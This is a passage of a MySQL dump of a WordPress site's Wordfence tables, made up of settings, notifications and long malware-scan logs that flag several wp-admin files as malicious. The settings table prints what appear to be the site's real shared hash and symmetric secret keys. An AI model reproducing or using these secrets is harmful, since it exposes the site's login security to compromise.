) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_2fa_secrets`
--

LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_settings`
--

DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_settings`
--

LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624357208','yes'),('ntp-offset','0.080955982208252','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','6fed1ea8c7f5ce2562dc49b1a8e0c38a0e2457d83f8e7d4833be74ba42bf8cdd','yes'),('shared-symmetric-secret','1aaf30480b6613c7bca98ed9565388ccacb28667a0b5a4e6f9a2777dcd055c0e','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfnotifications`
--

DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfnotifications`
--

LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-AEAAAAA',1,'wfplugin_updates',502,1631615030,'<a href=\"https://www.bournesociety.org.uk/wp-adminupdate-core.php\">Updates are available for WordPress (v5.8.1), 2 plugins, and 1 theme</a>','[]'),('site-AQAAAAA',1,'wfplugin_scan',502,1631615032,'<a href=\"https://www.bournesociety.org.uk/wp-adminadmin.php?page=WordfenceScan\">1234 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfpendingissues`
--

DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfpendingissues`
--

LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfreversecache`
--

DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfreversecache`
--

LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wp_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�@�','crawl-66-249-64-240.googlebot.com',1631570970),('\0\0\0\0\0\0\0\0\0\0��B�@�','crawl-66-249-64-252.googlebot.com',1631544360);
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfsnipcache`
--

DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=5895 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfsnipcache`
--

LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
INSERT INTO `wp_wfsnipcache` VALUES (5894,'193.151.129.83','2021-09-14 10:35:46','BLOCKED:600',0,2);
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfstatus`
--

DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=4754 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfstatus`
--

LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (3666,1630647201.910195,2,'info','Analyzed 1200 files containing 20.61 MB of data so far'),(3667,1630647206.675136,2,'info','Analyzed 1300 files containing 21.56 MB of data so far'),(3668,1630647212.355291,2,'info','Analyzed 1400 files containing 21.6 MB of data so far'),(3669,1630647218.181597,2,'info','Analyzed 1500 files containing 21.63 MB of data so far'),(3670,1630647224.229065,2,'info','Analyzed 1600 files containing 23.04 MB of data so far'),(3671,1630647230.010564,2,'info','Analyzed 1700 files containing 24.9 MB of data so far'),(3672,1630647238.534923,2,'info','Analyzed 1800 files containing 26.59 MB of data so far'),(3673,1630647244.002597,2,'info','Analyzed 1900 files containing 29.88 MB of data so far'),(3674,1630647248.841656,2,'info','Analyzed 2000 files containing 30.55 MB of data so far'),(3675,1630647254.489935,2,'info','Analyzed 2100 files containing 32.16 MB of data so far'),(3676,1630647259.823788,2,'info','Analyzed 2200 files containing 35.21 MB of data so far'),(3677,1630647270.964415,2,'info','Analyzed 2300 files containing 36.78 MB of data so far'),(3678,1630647279.220321,2,'info','Analyzed 2400 files containing 38.41 MB of data so far'),(3679,1630647284.992388,2,'info','Analyzed 2500 files containing 49.73 MB of data so far'),(3680,1630647289.611046,2,'info','Analyzed 2600 files containing 52.61 MB of data so far'),(3681,1630647294.573951,2,'info','Analyzed 2700 files containing 54.92 MB of data so far'),(3682,1630647299.566826,2,'info','Analyzed 2800 files containing 57.67 MB of data so far'),(3683,1630647303.976254,2,'info','Analyzed 2900 files containing 60.77 MB of data so far'),(3684,1630647312.995977,2,'info','Analyzed 3000 files containing 61.93 MB of data so far'),(3685,1630647318.819764,2,'info','Analyzed 3100 files containing 64.25 MB of data so far'),(3686,1630647324.990826,2,'info','Analyzed 3200 files containing 64.94 MB of data so far'),(3687,1630647332.622886,2,'info','Analyzed 3300 files containing 66.19 MB of data so far'),(3688,1630647341.270347,2,'info','Analyzed 3400 files containing 68.42 MB of data so far'),(3689,1630647349.224224,2,'info','Analyzed 3500 files containing 70.22 MB of data so far'),(3690,1630647356.715942,2,'info','Analyzed 3600 files containing 71.32 MB of data so far'),(3691,1630647368.379481,2,'info','Analyzed 3700 files containing 82.97 MB of data so far'),(3692,1630647379.566913,2,'info','Analyzed 3800 files containing 86.78 MB of data so far'),(3693,1630647387.650434,2,'info','Analyzed 3900 files containing 88.73 MB of data so far'),(3694,1630647394.654805,2,'info','Analyzed 4000 files containing 91.83 MB of data so far'),(3695,1630647401.240926,2,'info','Analyzed 4100 files containing 94.74 MB of data so far'),(3696,1630647408.001264,2,'info','Analyzed 4200 files containing 95.91 MB of data so far'),(3697,1630647416.137260,2,'info','Analyzed 4282 files containing 97.39 MB of data.'),(3705,1630647418.362157,2,'info','Starting scan of file contents'),(3706,1630647419.459459,2,'info','Scanned contents of 15 additional files at 14.41 per second'),(3707,1630647420.611023,2,'info','Scanned contents of 28 additional files at 12.77 per second'),(3708,1630647421.624040,2,'info','Scanned contents of 46 additional files at 14.35 per second'),(3709,1630647422.734586,2,'info','Scanned contents of 53 additional files at 12.28 per second'),(3710,1630647423.837345,2,'info','Scanned contents of 70 additional files at 12.92 per second'),(3711,1630647424.896646,2,'info','Scanned contents of 92 additional files at 14.20 per second'),(3712,1630647425.907440,2,'info','Scanned contents of 113 additional files at 15.09 per second'),(3713,1630647426.919262,2,'info','Scanned contents of 133 additional files at 15.65 per second'),(3714,1630647428.049609,2,'info','Scanned contents of 154 additional files at 15.99 per second'),(3715,1630647429.196395,2,'info','Scanned contents of 168 additional files at 15.59 per second'),(3716,1630647430.236422,2,'info','Scanned contents of 180 additional files at 15.23 per second'),(3717,1630647431.248007,2,'info','Scanned contents of 203 additional files at 15.82 per second'),(3718,1630647432.282768,2,'info','Scanned contents of 223 additional files at 16.08 per second'),(3719,1630647433.339653,2,'info','Scanned contents of 242 additional files at 16.22 per second'),(3720,1630647434.364186,2,'info','Scanned contents of 258 additional files at 16.18 per second'),(3721,1630647435.395843,2,'info','Scanned contents of 276 additional files at 16.26 per second'),(3722,1630647436.411188,2,'info','Scanned contents of 292 additional files at 16.23 per second'),(3723,1630647437.507327,2,'info','Scanned contents of 309 additional files at 16.19 per second'),(3724,1630647439.485542,2,'info','Scanned contents of 313 additional files at 14.86 per second'),(3725,1630647440.520017,2,'info','Scanned contents of 327 additional files at 14.80 per second'),(3726,1630647441.541938,2,'info','Scanned contents of 346 additional files at 14.96 per second'),(3727,1630647442.543528,2,'info','Scanned contents of 362 additional files at 15.01 per second'),(3728,1630647443.582064,2,'info','Scanned contents of 379 additional files at 15.06 per second'),(3729,1630647444.591294,2,'info','Scanned contents of 397 additional files at 15.17 per second'),(3730,1630647445.613878,2,'info','Scanned contents of 409 additional files at 15.04 per second'),(3731,1630647446.623895,2,'info','Scanned contents of 430 additional files at 15.25 per second'),(3732,1630647447.666444,2,'info','Scanned contents of 448 additional files at 15.32 per second'),(3733,1630647448.988822,2,'info','Scanned contents of 466 additional files at 15.24 per second'),(3734,1630647449.990720,2,'info','Scanned contents of 486 additional files at 15.39 per second'),(3735,1630647451.001472,2,'info','Scanned contents of 501 additional files at 15.38 per second'),(3736,1630647452.016640,2,'info','Scanned contents of 525 additional files at 15.63 per second'),(3737,1630647453.135334,2,'info','Scanned contents of 538 additional files at 15.50 per second'),(3738,1630647454.199113,2,'info','Scanned contents of 560 additional files at 15.65 per second'),(3739,1630647455.761420,2,'info','Scanned contents of 577 additional files at 15.45 per second'),(3740,1630647456.767464,2,'info','Scanned contents of 597 additional files at 15.57 per second'),(3741,1630647457.791583,2,'info','Scanned contents of 615 additional files at 15.62 per second'),(3742,1630647459.116774,2,'info','Scanned contents of 616 additional files at 15.14 per second'),(3743,1630647460.950568,2,'info','Scanned contents of 617 additional files at 14.51 per second'),(3744,1630647461.978487,2,'info','Scanned contents of 641 additional files at 14.72 per second'),(3745,1630647463.013988,2,'info','Scanned contents of 668 additional files at 14.98 per second'),(3746,1630647464.038987,2,'info','Scanned contents of 689 additional files at 15.10 per second'),(3747,1630647465.146133,2,'info','Scanned contents of 705 additional files at 15.09 per second'),(3748,1630647466.179130,2,'info','Scanned contents of 708 additional files at 14.82 per second'),(3749,1630647467.213292,2,'info','Scanned contents of 726 additional files at 14.88 per second'),(3750,1630647468.230480,2,'info','Scanned contents of 747 additional files at 15.00 per second'),(3751,1630647469.255056,2,'info','Scanned contents of 763 additional files at 15.01 per second'),(3752,1630647470.288236,2,'info','Scanned contents of 783 additional files at 15.10 per second'),(3753,1630647471.784070,2,'info','Scanned contents of 793 additional files at 14.86 per second'),(3754,1630647473.897569,2,'info','Scanned contents of 811 additional files at 14.62 per second'),(3755,1630647474.920275,2,'info','Scanned contents of 821 additional files at 14.53 per second'),(3756,1630647475.943299,2,'info','Scanned contents of 843 additional files at 14.65 per second'),(3757,1630647476.954796,2,'info','Scanned contents of 859 additional files at 14.67 per second'),(3758,1630647478.034772,2,'info','Scanned contents of 879 additional files at 14.74 per second'),(3759,1630647479.050658,2,'info','Scanned contents of 901 additional files at 14.86 per second'),(3760,1630647480.073722,2,'info','Scanned contents of 923 additional files at 14.97 per second'),(3761,1630647481.088652,2,'info','Scanned contents of 942 additional files at 15.03 per second'),(3762,1630647482.183212,2,'info','Scanned contents of 961 additional files at 15.07 per second'),(3763,1630647483.202202,2,'info','Scanned contents of 982 additional files at 15.16 per second'),(3764,1630647484.212872,2,'info','Scanned contents of 1003 additional files at 15.24 per second'),(3765,1630647485.266261,2,'info','Scanned contents of 1016 additional files at 15.20 per second'),(3766,1630647486.293948,2,'info','Scanned contents of 1035 additional files at 15.25 per second'),(3767,1630647487.597101,2,'info','Scanned contents of 1052 additional files at 15.21 per second'),(3768,1630647488.598889,2,'info','Scanned contents of 1069 additional files at 15.23 per second'),(3769,1630647489.607791,2,'info','Scanned contents of 1090 additional files at 15.31 per second'),(3770,1630647490.624228,2,'info','Scanned contents of 1110 additional files at 15.37 per second'),(3771,1630647491.774041,2,'info','Scanned contents of 1131 additional files at 15.42 per second'),(3772,1630647492.793045,2,'info','Scanned contents of 1141 additional files at 15.34 per second'),(3773,1630647493.825211,2,'info','Scanned contents of 1160 additional files at 15.38 per second'),(3774,1630647494.101753,2,'info','Scanned contents of 1165 additional files at 15.39 per second'),(3775,1630647494.112855,2,'info','Asking Wordfence to check URLs against malware list.'),(3776,1630647494.140925,2,'info','Checking 3090 host keys against Wordfence scanning servers.'),(3777,1630647494.920811,2,'info','Done host key check.'),(3778,1630647495.891652,2,'info','Done file contents scan'),(3779,1630647495.935677,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/wpimages.php'),(3780,1630647495.971080,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/cachewpcheck.php'),(3781,1630647495.997299,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(3782,1630647496.043369,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/object-cache.php'),(3788,1630647496.939435,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3789,1630647496.962994,2,'info','Checking 261 host keys against Wordfence scanning servers.'),(3790,1630647497.793620,2,'info','Done host key check.'),(3791,1630647498.267996,2,'info','Done examining URLs'),(3796,1630647500.184603,2,'info','Starting password strength check on 1 user.'),(3803,1630647504.263822,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3804,1630647504.273165,2,'info','Done examining URLs'),(3806,1630647504.571207,1,'info','-------------------'),(3807,1630647504.584272,2,'info','Wordfence used 16.2 MB of memory for scan. Server peak memory usage was: 36.2 MB'),(3808,1630647504.595525,1,'info','Scan Complete. Scanned 4282 files, 2 plugins, 2 themes, 43 posts, 0 comments and 3610 URLs in 6 minutes 27 seconds.'),(3811,1630664461.943823,1,'info','Initiating quick scan'),(3816,1630664462.178668,1,'info','-------------------'),(3817,1630664462.207161,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(3818,1630664462.219513,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3821,1630750928.250868,1,'info','Initiating quick scan'),(3826,1630750928.520776,1,'info','-------------------'),(3827,1630750928.543919,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(3828,1630750928.558123,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3831,1630837751.627989,1,'info','Initiating quick scan'),(3836,1630837753.209045,1,'info','-------------------'),(3837,1630837753.348348,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(3838,1630837753.420729,1,'info','Quick Scan Complete. Scanned in 2 seconds.'),(3840,1630906425.792991,1,'info','Scheduled Wordfence scan starting at Monday 6th of September 2021 05:33:45 AM'),(3842,1630906429.478877,1,'info','Contacting Wordfence to initiate scan'),(3849,1630906438.569816,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3850,1630906438.593075,2,'info','The disk has 3459389 MB available'),(3858,1630906439.854303,2,'info','Getting plugin list from WordPress'),(3859,1630906440.791801,2,'info','Found 2 plugins'),(3860,1630906440.819909,2,'info','Getting theme list from WordPress'),(3861,1630906441.206525,2,'info','Found 2 themes'),(3873,1630906447.746157,2,'info','500 files indexed'),(3874,1630906448.227139,2,'info','1000 files indexed'),(3875,1630906448.530958,2,'info','1500 files indexed'),(3876,1630906449.069206,2,'info','2000 files indexed'),(3877,1630906449.450285,2,'info','2500 files indexed'),(3878,1630906449.784396,2,'info','3000 files indexed'),(3879,1630906450.077651,2,'info','3500 files indexed'),(3880,1630906450.476928,2,'info','4000 files indexed'),(3881,1630906450.647032,2,'info','4282 files indexed'),(3882,1630906481.336002,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(3883,1630906513.120615,2,'info','Analyzed 200 files containing 2.94 MB of data so far'),(3884,1630906534.375448,2,'info','Analyzed 300 files containing 4.45 MB of data so far'),(3885,1630906556.958836,2,'info','Analyzed 400 files containing 7.23 MB of data so far'),(3886,1630906586.628688,2,'info','Analyzed 500 files containing 8.29 MB of data so far'),(3887,1630906608.711938,2,'info','Analyzed 600 files containing 8.98 MB of data so far'),(3888,1630906647.333582,2,'info','Analyzed 700 files containing 9.95 MB of data so far'),(3889,1630906665.694415,2,'info','Analyzed 800 files containing 11.69 MB of data so far'),(3890,1630906684.768421,2,'info','Analyzed 900 files containing 17.09 MB of data so far'),(3891,1630906707.888789,2,'info','Analyzed 1000 files containing 18.71 MB of data so far'),(3892,1630906731.654465,2,'info','Analyzed 1100 files containing 19.88 MB of data so far'),(3893,1630906757.002854,2,'info','Analyzed 1200 files containing 20.61 MB of data so far'),(3894,1630906782.913307,2,'info','Analyzed 1300 files containing 21.56 MB of data so far'),(3895,1630906810.682625,2,'info','Analyzed 1400 files containing 21.6 MB of data so far'),(3896,1630906834.626708,2,'info','Analyzed 1500 files containing 21.63 MB of data so far'),(3897,1630906856.464870,2,'info','Analyzed 1600 files containing 23.04 MB of data so far'),(3898,1630906877.822549,2,'info','Analyzed 1700 files containing 24.9 MB of data so far'),(3899,1630906898.685070,2,'info','Analyzed 1800 files containing 26.59 MB of data so far'),(3900,1630906918.491294,2,'info','Analyzed 1900 files containing 29.88 MB of data so far'),(3901,1630906940.759521,2,'info','Analyzed 2000 files containing 30.55 MB of data so far'),(3902,1630906963.506860,2,'info','Analyzed 2100 files containing 32.16 MB of data so far'),(3903,1630906984.942594,2,'info','Analyzed 2200 files containing 35.21 MB of data so far'),(3904,1630907011.340707,2,'info','Analyzed 2300 files containing 36.78 MB of data so far'),(3905,1630907034.092707,2,'info','Analyzed 2400 files containing 38.41 MB of data so far'),(3906,1630907061.893475,2,'info','Analyzed 2500 files containing 49.73 MB of data so far'),(3907,1630907099.833266,2,'info','Analyzed 2600 files containing 52.61 MB of data so far'),(3908,1630907119.883712,2,'info','Analyzed 2700 files containing 54.92 MB of data so far'),(3909,1630907138.719339,2,'info','Analyzed 2800 files containing 57.67 MB of data so far'),(3910,1630907158.000446,2,'info','Analyzed 2900 files containing 60.77 MB of data so far'),(3911,1630907181.930167,2,'info','Analyzed 3000 files containing 61.93 MB of data so far'),(3912,1630907217.309602,2,'info','Analyzed 3100 files containing 64.25 MB of data so far'),(3913,1630907249.639519,2,'info','Analyzed 3200 files containing 64.94 MB of data so far'),(3914,1630907288.085354,2,'info','Analyzed 3300 files containing 66.19 MB of data so far'),(3915,1630907331.122738,2,'info','Analyzed 3400 files containing 68.42 MB of data so far'),(3916,1630907361.769404,2,'info','Analyzed 3500 files containing 70.22 MB of data so far'),(3917,1630907387.059613,2,'info','Analyzed 3600 files containing 71.32 MB of data so far'),(3918,1630907415.330788,2,'info','Analyzed 3700 files containing 82.97 MB of data so far'),(3919,1630907448.558611,2,'info','Analyzed 3800 files containing 86.78 MB of data so far'),(3920,1630907480.734372,2,'info','Analyzed 3900 files containing 88.73 MB of data so far'),(3921,1630907519.797026,2,'info','Analyzed 4000 files containing 91.83 MB of data so far'),(3922,1630907548.552984,2,'info','Analyzed 4100 files containing 94.74 MB of data so far'),(3923,1630907579.820057,2,'info','Analyzed 4200 files containing 95.91 MB of data so far'),(3924,1630907613.942581,2,'info','Analyzed 4282 files containing 97.39 MB of data.'),(3932,1630907617.611802,2,'info','Starting scan of file contents'),(3933,1630907619.015372,2,'info','Scanned contents of 5 additional files at 4.26 per second'),(3934,1630907620.085790,2,'info','Scanned contents of 15 additional files at 6.69 per second'),(3935,1630907621.341604,2,'info','Scanned contents of 22 additional files at 6.29 per second'),(3936,1630907622.434163,2,'info','Scanned contents of 28 additional files at 6.10 per second'),(3937,1630907624.805286,2,'info','Scanned contents of 31 additional files at 4.45 per second'),(3938,1630907625.934430,2,'info','Scanned contents of 35 additional files at 4.33 per second'),(3939,1630907627.342080,2,'info','Scanned contents of 36 additional files at 3.79 per second'),(3940,1630907628.516293,2,'info','Scanned contents of 41 additional files at 3.84 per second'),(3941,1630907629.563500,2,'info','Scanned contents of 46 additional files at 3.92 per second'),(3942,1630907630.649308,2,'info','Scanned contents of 50 additional files at 3.90 per second'),(3943,1630907631.719700,2,'info','Scanned contents of 57 additional files at 4.11 per second'),(3944,1630907632.778578,2,'info','Scanned contents of 62 additional files at 4.15 per second'),(3945,1630907634.109421,2,'info','Scanned contents of 66 additional files at 4.06 per second'),(3946,1630907639.056384,2,'info','Scanned contents of 70 additional files at 3.30 per second'),(3947,1630907641.348931,2,'info','Scanned contents of 71 additional files at 3.02 per second'),(3948,1630907642.512886,2,'info','Scanned contents of 78 additional files at 3.16 per second'),(3949,1630907643.518519,2,'info','Scanned contents of 84 additional files at 3.27 per second'),(3950,1630907644.553856,2,'info','Scanned contents of 89 additional files at 3.33 per second'),(3951,1630907645.652804,2,'info','Scanned contents of 94 additional files at 3.38 per second'),(3952,1630907646.679270,2,'info','Scanned contents of 100 additional files at 3.47 per second'),(3953,1630907647.762533,2,'info','Scanned contents of 106 additional files at 3.54 per second'),(3954,1630907648.819989,2,'info','Scanned contents of 112 additional files at 3.62 per second'),(3955,1630907650.354933,2,'info','Scanned contents of 118 additional files at 3.63 per second'),(3956,1630907651.355142,2,'info','Scanned contents of 125 additional files at 3.73 per second'),(3957,1630907652.395940,2,'info','Scanned contents of 135 additional files at 3.91 per second'),(3958,1630907653.488074,2,'info','Scanned contents of 143 additional files at 4.01 per second'),(3959,1630907654.571645,2,'info','Scanned contents of 149 additional files at 4.06 per second'),(3960,1630907655.630892,2,'info','Scanned contents of 155 additional files at 4.10 per second'),(3961,1630907659.213114,2,'info','Scanned contents of 157 additional files at 3.79 per second'),(3962,1630907660.312467,2,'info','Scanned contents of 164 additional files at 3.86 per second'),(3963,1630907661.511724,2,'info','Scanned contents of 169 additional files at 3.87 per second'),(3964,1630907662.784424,2,'info','Scanned contents of 174 additional files at 3.87 per second'),(3965,1630907663.910160,2,'info','Scanned contents of 179 additional files at 3.89 per second'),(3966,1630907665.031150,2,'info','Scanned contents of 184 additional files at 3.90 per second'),(3967,1630907666.061193,2,'info','Scanned contents of 189 additional files at 3.92 per second'),(3968,1630907667.430961,2,'info','Scanned contents of 195 additional files at 3.93 per second'),(3969,1630907668.532603,2,'info','Scanned contents of 202 additional files at 3.98 per second'),(3970,1630907669.605575,2,'info','Scanned contents of 206 additional files at 3.98 per second'),(3971,1630907671.207022,2,'info','Scanned contents of 209 additional files at 3.92 per second'),(3972,1630907673.658596,2,'info','Scanned contents of 210 additional files at 3.76 per second'),(3973,1630907675.092642,2,'info','Scanned contents of 211 additional files at 3.69 per second'),(3974,1630907676.534679,2,'info','Scanned contents of 212 additional files at 3.61 per second'),(3975,1630907677.550744,2,'info','Scanned contents of 218 additional files at 3.65 per second'),(3976,1630907678.704697,2,'info','Scanned contents of 225 additional files at 3.70 per second'),(3977,1630907681.862595,2,'info','Scanned contents of 227 additional files at 3.55 per second'),(3978,1630907682.878801,2,'info','Scanned contents of 232 additional files at 3.57 per second'),(3979,1630907684.002876,2,'info','Scanned contents of 239 additional files at 3.61 per second'),(3980,1630907685.018612,2,'info','Scanned contents of 247 additional files at 3.68 per second'),(3981,1630907686.027580,2,'info','Scanned contents of 251 additional files at 3.68 per second'),(3982,1630907687.055096,2,'info','Scanned contents of 260 additional files at 3.76 per second'),(3983,1630907688.473379,2,'info','Scanned contents of 266 additional files at 3.77 per second'),(3984,1630907689.502022,2,'info','Scanned contents of 269 additional files at 3.75 per second'),(3985,1630907690.616883,2,'info','Scanned contents of 274 additional files at 3.77 per second'),(3986,1630907692.014906,2,'info','Scanned contents of 278 additional files at 3.75 per second'),(3987,1630907694.826008,2,'info','Scanned contents of 279 additional files at 3.62 per second'),(3988,1630907696.054666,2,'info','Scanned contents of 285 additional files at 3.64 per second'),(3989,1630907697.129530,2,'info','Scanned contents of 288 additional files at 3.63 per second'),(3990,1630907698.210290,2,'info','Scanned contents of 291 additional files at 3.62 per second'),(3991,1630907699.307055,2,'info','Scanned contents of 294 additional files at 3.61 per second'),(3992,1630907700.454118,2,'info','Scanned contents of 297 additional files at 3.60 per second'),(3993,1630907701.600532,2,'info','Scanned contents of 299 additional files at 3.57 per second'),(3994,1630907702.618958,2,'info','Scanned contents of 303 additional files at 3.57 per second'),(3995,1630907703.859152,2,'info','Scanned contents of 307 additional files at 3.57 per second'),(3996,1630907705.012644,2,'info','Scanned contents of 312 additional files at 3.58 per second'),(3997,1630907706.080352,2,'info','Scanned contents of 317 additional files at 3.59 per second'),(3998,1630907707.359786,2,'info','Scanned contents of 318 additional files at 3.55 per second'),(3999,1630907715.944322,2,'info','Scanned contents of 319 additional files at 3.25 per second'),(4000,1630907717.417439,2,'info','Scanned contents of 320 additional files at 3.21 per second'),(4001,1630907718.468852,2,'info','Scanned contents of 324 additional files at 3.22 per second'),(4002,1630907719.501381,2,'info','Scanned contents of 327 additional files at 3.22 per second'),(4003,1630907720.753243,2,'info','Scanned contents of 333 additional files at 3.24 per second'),(4004,1630907721.800905,2,'info','Scanned contents of 337 additional files at 3.24 per second'),(4005,1630907722.832877,2,'info','Scanned contents of 340 additional files at 3.24 per second'),(4006,1630907724.043369,2,'info','Scanned contents of 344 additional files at 3.24 per second'),(4007,1630907725.185871,2,'info','Scanned contents of 348 additional files at 3.24 per second'),(4008,1630907726.379018,2,'info','Scanned contents of 352 additional files at 3.24 per second'),(4009,1630907727.769377,2,'info','Scanned contents of 356 additional files at 3.24 per second'),(4010,1630907734.635184,2,'info','Scanned contents of 357 additional files at 3.06 per second'),(4011,1630907735.743731,2,'info','Scanned contents of 360 additional files at 3.05 per second'),(4012,1630907736.782812,2,'info','Scanned contents of 364 additional files at 3.06 per second'),(4013,1630907737.977545,2,'info','Scanned contents 